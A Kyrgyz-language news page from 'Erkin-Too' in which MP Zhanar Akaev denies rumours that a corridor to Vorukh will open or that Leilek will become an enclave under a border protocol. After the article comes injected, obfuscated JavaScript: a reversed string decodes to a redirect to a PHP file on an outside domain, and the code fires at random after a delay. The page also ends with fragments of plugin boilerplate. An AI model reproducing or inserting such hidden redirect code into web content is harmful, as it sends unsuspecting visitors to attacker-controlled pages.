"Эркин-Тоо"

ЖК депутаты Жанар АКАЕВ: “Лейлек анклав болбойт”

Кечээ социалдык тармактарда “№39 протокол боюнча” деген маалыматтар тарап, ага терс пикирлер жазылып, бир топ адамдар бийлик жетекчилерин жерден алып көргө салышты. Мындай кырдаалда ММК өкүлдөрү бардык нерсени так аныктап алган соң коомчулукка туура маалыматты берүүбүз абзел. Буга улай Жогорку Кеңештин депутаты, Эл аралык иштер, коргоо, коопсуздук жана миграция боюнча комитетинин төрагасы Жанар Акаев коомчулукка туура маалыматты берип, элди дүрбөлөңгө түшпөөгө чакырды. Төмөндө эл өкүлүнүн сөзү толугу менен…

-Урматтуу мекендештер, соңку учурда интернет желелеринде Баткендеги чек ара чыры талкуу болуп, анда “Ворухка коридор ачылат экен, Лейлек анклавда калат экен” деген кабатырлануу болууда. Эл аралык иштер, коргоо, коопсуздук жана миграция боюнча комитети жабык эшик артында жыйын өткөрдүк. Ага Улуттук коопсуздук мамлекеттик комитетинин төрагасы Камчыбек Ташиев, Чек ара кызматынын башчысы Уларбек Шаршеев жана башка тиешелүү жетекчилери келип катышты. Жыйында айтылгандай эч кандай Ворухка коридор берилбейт, Лейлек анклав болбойт. Бул жөнүндө сөз болушу да мүмкүн эмес. Буга азыр кабатырланууга негиз жок. Анткени, кандайдыр бир протокол ишке кириш үчүн мамлекеттер аралык өзүнчө келишим болот.  Ал келишим жөнүндө процедура болгон жок. Ошондой эле ал келишимге эки өлкөнүн президенттери терең изилдеп чыккандан кийин кол коёт. Эки өлкөнүн президенттери кол койгон соң гана ишке ашат. Азырынча алардын кол коюу ниеттери жөнүндө уккан жокпуз. Андыктан, Кыргызстандын кызыкчылыгына каршы келген иш-аракет болбойт деп ишендирип кетем. Урматтуу мекендештер, “Ворухка коридор ачылат. Лейлек анклавда калат. 139-протокол күчүнө кириптир” деген ушак-айың сөздөргө көңүл бурбай, расмий маалыматтарга ишениңиздер!

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/01_02.pdf»>2022-жылдын 1-февралы
Жазгүл КАРБОСОВА

Please wait while flipbook is loading. For more related info, FAQs and issues please refer to DearFlip WordPress Flipbook Plugin Help documentation.

Пример HTML-страницы
error: Content is protected !!